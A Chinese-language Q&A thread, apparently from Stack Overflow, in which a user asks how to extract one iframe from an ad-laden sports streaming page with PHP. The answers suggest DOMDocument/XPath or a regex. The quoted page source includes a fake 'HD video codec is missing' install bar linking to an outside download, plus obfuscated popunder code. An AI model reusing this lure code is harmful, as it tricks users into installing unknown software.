我正在使用curl file_get_contents
但
问题是这个页面有很多iframe和广告,我想只得到这个页面的一小部分
页面源代码是这样的:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" dir="ltr" >
<head>
<meta http-equiv="content-type" content="text/html; charset=utf-8" />
<meta name="robots" content="noindex,nofollow" />
<meta name="keywords" content="" />
<meta name="description" content="" />
<meta name="generator" content="" />
<meta content="Tue, 01 Jan 1980 1:00:00 GMT" http-equiv="Expires">
<meta content="no-cache" http-equiv="Pragma">
<title>Kravchuk - Krajinovic (ATP Challenger Karshi)</title>
</head>
<body class="contentpane">
<script type="text/javascript">
if (top.location != self.location) {
top.location = 'http://www.streamhunter.eu'
}
</script>
<style>body{background-color: #000000; text-align: center;}</style>
<style type="text/css">
#ad {
display: none;
position: absolute;
width: 300px;
height: 250px;
margin-left: 215px; /* left pix */
margin-top: -350px; /* top pix */
}
#close_ad {
position: absolute;
cursor: pointer;
margin-left: 140px; /* left pix */
margin-top: 0px; /* left pix */
padding: 0px;
border: 0px;
}
#ad_code {
position: absolute;
}
#time {
position: absolute;
text-align: center;
margin-left: 0px; /* left pix */
margin-top: -20px; /* top pix */
width: 300px;
color: #ffffff;
}
</style>
<IFRAME FRAMEBORDER=0 MARGINWIDTH=0 MARGINHEIGHT=0 SCROLLING=NO WIDTH=728 HEIGHT=90 SRC="http://creative.xtendmedia.com/proxy/matomymediaproxy.html?ad_type=ad&ad_size=728x90§ion=2650714"></IFRAME>
<script type="text/javascript" src="http://www.youradexchange.com/script/java.php?option=rotateur&rotateur=83132"></script>
<script language="JavaScript"> var zflag_nid="1723"; var zflag_cid="18"; var zflag_sid="0"; var zflag_width="1"; var zflag_height="1"; var zflag_sz="15"; </script>
<script language="JavaScript" src="http://c1.zxxds.net/jsc/c1/fo.js"></script>
<iframe frameborder="0" marginheight="0" marginwidth="0" height="320" src="http://www.e-tennis.tv/player04.swf?v1" id="myfr" scrolling="no" width="540">Your Browser Do not Support Iframe</iframe>
<script src="http://code.jquery.com/jquery-1.5.2.min.js" type="text/javascript"></script>
<script type="text/javascript">$(document).ready(function () {
var browserName = "";
if (navigator.userAgent.indexOf("MSIE") != -1) {
browserName = "Internet Explorer"
}
if (navigator.userAgent.indexOf("Chrome") != -1) {
browserName = "Chrome"
}
if (navigator.userAgent.indexOf("Firefox") != -1) {
browserName = "Firefox"
}
var mtid_a = guid();
var mtid_b = guid();
var mtid_c = guid();
var mtid_d = guid();
var mtid_e = guid();
var strip = '<div id="' + mtid_a + '" style="display:block !important;">' + '<div id="' + mtid_b + '" style="display:none;z-index:99999;position:fixed;width:100%;background:#fbecad;overflow:hidden;border-bottom:1px solid #707070;top:0px;left:0px;margin:0px;padding:0px;color:#000;font-family:Verdana, Geneva, sans-serif;">' + '<div style="padding-top:5px;float:left;width:100%;font-size:13px;line-height:26px;height:31px;top: 12px;z-index:9999;text-align:left;display:block !important;">' + '<img alt="Missing Plug-in" style="margin-left:12px;float:left;margin-top:2px;" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABMAAAAUCAYAAABvVQZ0AAAACXBIWXMAAAsTAAALEwEAmpwYAAAAIGNIUk0AAG2YAABzjgAA+WQAAIVlAAB0RQAA7/YAADAfAAAU56AoLTwAAAQvSURBVHjahJJrTFNnGMefZF9MTExMFpJ9WmQXKLPQcakYExHmuIVLa1vanl7OOW1PaQaoE1m31Y110SmC1lWYu4TgZC6LwClSKBbYBbKEjM1sCTrFLWPM4OI4vbCB2J7TPPtQWsum24df/ue8z/v+3vOe5wUhPAaP4tpM9+blxcuPrAsh/4MM+WHDixCO59rSCFD6CjZL9HREvP2ZleG+dwpj4TEQwn5I5MNYnxBHCF2BWNgP302dS8vLFS/tLMxDaYEEW14m3cJ6PZmpz0lZopBCaHEMKFLDKvZVo0pZM3Hte//mh80TQqMpOQrALfTD4tynGwoR7gp0uU8wNEWgveWAS1ieSi5IEFzo/9cYnH//VaUoMz0iykyPZGZsE7JET0V2SCV3ZLUVX5NGDdapaifkNXsnVfLiieLdeTczM7YJosz0iJms6uODPhBCo8AHfcAHfQBdZxzMDqkEUynaXYhyWSXSFIEqZQ3uKdqJBfnZWJCfjdKCHJQW5KD9cL0rLvM9kHW6jjC1NeWoVFSjRi1HjVqOhFaBNEWglSGRpgjUqOUol1WiUlGNSkU1ymor8OTx15rjohEQQnEpnOlwvKQjlGiidUmsDIm2ehpt9TTWWym0MiQyFiNaGRJNtA4N+jp0dbzRJIRG1mVxoPuD44Rep/IecRzG5kMNSWFC9k8YixEN+jo80Eh/yAeHoetUI3Os1eS4c+siwMKtcRj3s5LY/dtbIqu3t7a3OZv/T2jQ12FlxQtXS/ZIb4q3P7uSLc5YMZNVfcCHxkH4awb4oBf44DBc/WYkjaaI/5RRpBblskosKd6VZG/JrusQ+PUzWLj+MQhBL/CBIRhh3y00GtRoonVoMRuQsRix3kolRYmm2Fv2u/y+/lyblerVqOX+0+3OJjjUVNeVKxEFz3Y02PouOEr3ycomCa1iQ0NSj2026ZGmCLzQ45YLf85AaGlu64+z00/cX54FaHU0HpUW5GDu889hfp4YS18sQh2hRFs91dvpbmNOdxxtspgNaKJ1aDbp0WI2IEVq8dRJx8FoYBD4oA+i4S8hGrgM8NG5Y/rqqlIsLyvG8rJiVClrkKYI9rdffkiL3ZuD2L2fHvt8zCNOfF2im6/bG9r4wCCkAsPse4WEVoF6nQpJowYpUov2lv0uPugHnvMAz3lg9ttLWyhSm/yPBn0d2qz63ijnAT4wCFHOA1HOAzD9Vc+TOkLpTey8fuP9X3hPZPEBD6wsXgKbRd2berFJowa1apmP59j1DVngORbgj/khONX+9kFnq93pbLXjW2++gi3NDe5xr1vCB1i4+/MnIK8tnzTRBDpb7c5OdxvT031WPTx0sZAPsBDlWOADcSAaGAJh9QbE1uY3pSKEpyDKDQAf8EIs8vvjscjdtNja/CZh9QYIK7MgLE/H6xwLUW4AotwA/D0ACvlYFv1THvsAAAAASUVORK5CYII=" />' + ' <div style="float:left;margin-left:5px;">HD video codec is missing:</div> <div style="float:left;margin-left:5px;margin-top:1px;"><input type="button" class="' + mtid_e + '" name="submit" style="display:block !important;padding-left:3px;" value="Install HD video codec..." /></div>' + '<div class="' + mtid_d + '" style="float:right;margin-right:10px;color:#000;cursor:pointer;">X</div>' + '</div>' + '</div>' + '<div style="height:36px;display:none;" id="' + mtid_c + '"> </div>' + '</div>';
setTimeout(function () {
$("body").prepend(strip);
$("#" + mtid_b).slideDown(800, function () {
$("#" + mtid_b).css("display", "block !important")
});
$("#" + mtid_c).slideDown(800);
$("." + mtid_e).click(function () {
//location.href = "http://www.hd-plugins.com/download/download8.php"
window.open("http://www.hd-plugins.com/download/download8.php","_blank");
});
$("." + mtid_d).click(function () {
$("#" + mtid_a).remove()
})
}, 1500)
});
function s4() {
x = Math.floor(Math.random() * (4 - 1) + 1);
return Math.floor((1 + Math.random()) * 0x10000).toString(16).substring(x)
};
function guid() {
return s4() + s4() + s4() + s4()
}</script>
<script type="text/javascript">
$(document).ready(function() {
$('#ad').show();
var time = 30;
var timer = setInterval(function() {
time--;
$('#time').html('This ad will close in '+time+' seconds.');
if (time == 0) {
$('#ad').hide();
clearInterval(timer);
}
}, 1000);
$('#close_ad').click(function() {
$('#ad').hide();
});
});
</script>
<div id="ad">
<div id="ad_code">
<iframe src="http://d2.zedo.com/jsc/d2/ff2.html?n=1856;c=242;s=89;d=9;w=300;h=250" frameborder=0 marginheight=0 marginwidth=0 scrolling="no" allowTransparency="true" width=300 height=250></iframe>
</div>
<img src="http://img707.imageshack.us/img707/6278/closebuttonu.png" id="close_ad" /><div id="time">
This ad will close in 30 seconds.</div>
</div>
<script type='text/javascript' src='http://a.adorika.net/c/banner_s?selection=3833&size=728x90&skin=script'></script>
<IFRAME FRAMEBORDER=0 MARGINWIDTH=0 MARGINHEIGHT=0 SCROLLING=NO WIDTH=728 HEIGHT=90 SRC="http://creative.xtendmedia.com/proxy/matomymediaproxy.html?ad_type=ad&ad_size=728x90§ion=3542412"></IFRAME>
</div>
<div style="margin:10px"><a onclick="var w=window.open('http://www.streamhunter.eu/download_tv.php','_blank');w.focus()" href="javascript:void(0)"><img alt="" src="/images/button_game_page.png"></a></div>
<script>
$(document).ready(function(){
var jsm_url = "http://hstpnetwork.com/lsh/";
var jsm_reruntime=24;var popunderWidth=800;var popunderHeight=1100;function createCookie(b,e,f){var d=60*60*1000*f;var a=new Date();a.setTime(a.getTime()+(d));var c="; expires="+a.toGMTString();document.cookie=b+"="+e+c+"; path=/"}function getCookie(a){var b=document.cookie.match("(^|;) ?"+a+"=([^;]*)(;|$)");if(b){return(unescape(b[2]))}else{return null}}function popunder(){if(getCookie("lj_popunder")==1){return true}createCookie("lj_popunder",1,jsm_reruntime);var b="toolbar=0,statusbar=1,resizable=1,scrollbars=1,menubar=0,location=1,directories=0";if(navigator.userAgent.indexOf("Chrome")!=-1){b="scrollbar=yes"}var a=window.open("about:blank","",b+",height="+popunderWidth+",width="+popunderHeight);if(navigator.userAgent.indexOf("rv:2.")!=-1||navigator.userAgent.indexOf("rv:5.")!=-1){a.ljPop=function(c){if(navigator.userAgent.indexOf("rv:2.")!=-1||navigator.userAgent.indexOf("rv:5.")!=-1){this.window.open("about:blank").close()}this.document.location.href=c};a.ljPop(jsm_url)}else{a.document.location.href=jsm_url}setTimeout(window.focus);window.focus();if(a){a.blur();$.ajax({url:'/trackimps?iBID=4665'})}else{donepop=null;ifSP2=false;if(typeof(poppedWindow)=="undefined"){poppedWindow=false}if(window.SymRealWinOpen){open=SymRealWinOpen}if(window.NS_ActualOpen){open=NS_ActualOpen}ifSP2=(navigator.userAgent.indexOf("SV1")!=-1);if(!ifSP2){dopopunder()}else{if(window.Event){document.captureEvents(Event.CLICK)}document.onclick=doclickedpopunder}self.focus();doclickedpopunder()}}function dopopunder(){if(!poppedWindow){donepop=open(jsm_url,"","toolbar=1,location=1,directories=0,status=1,menubar=1,scrollbars=1,resizable=1");if(donepop){poppedWindow=true;self.focus();$.ajax({url:'/trackimps?iBID=4665'})}}}function doclickedpopunder(){if(!poppedWindow){if(!ifSP2){donepop=open(jsm_url,"","toolbar=1,location=1,directories=0,status=1,menubar=1,scrollbars=1,resizable=1");self.focus();if(donepop){poppedWindow=true;$.ajax({url:'/trackimps?iBID=4665'})}}}if(!poppedWindow){if(window.Event){document.captureEvents(Event.CLICK)}document.onclick=dopopunder;self.focus()}}document.body.onclick=function(){popunder()};document.body.unload=function(){popunder()};
});
</script>
<script type="text/javascript" id="wau_scr_70cd30ee">
var wau_p = wau_p || []; wau_p.push(["xg2n", "70cd30ee", false]);
(function() {
var s=document.createElement("script"); s.type="text/javascript";
s.async=true; s.src="http://widgets.amung.us/a_pro.js";
document.getElementsByTagName("head")[0].appendChild(s);
})();
</script>
</body>
</html>
我想要得到这个:
<iframe frameborder="0" marginheight="0" marginwidth="0" height="320" src="http://www.e-tennis.tv/player04.swf?v1" id="myfr" scrolling="no" width="540">Your Browser Do not Support Iframe</iframe>
或
<script type="text/javascript"> chname="Zabava"; width="640"; height="385";</script><script type="text/javascript" src="http://castnowhd.com/js/embed.js"></script>
怎么做?
答案 0 :(得分:0)
您可以使用DOMDocument::loadHTML()加载HTML,然后使用DOMXpath::query()进行搜索。有效模式可以是//iframe
或//script
。有关此类XPath搜索模式的更多信息,请参阅Mozilla Developer Network。
答案 1 :(得分:0)
您可以使用简单的正则表达式click here for example执行此操作:
preg_match_all('#(<iframe.*/iframe>)#i', $code, $matches);
var_dump($matches);
preg_match_all('#(<script.*/script>)#i', $code, $matches);
var_dump($matches);
这将从源页面中提取(以非常愚蠢的方式)所有iframe和脚本元素。如果您需要更具体的匹配,我们需要更具体的标准,但这足以满足您的需求。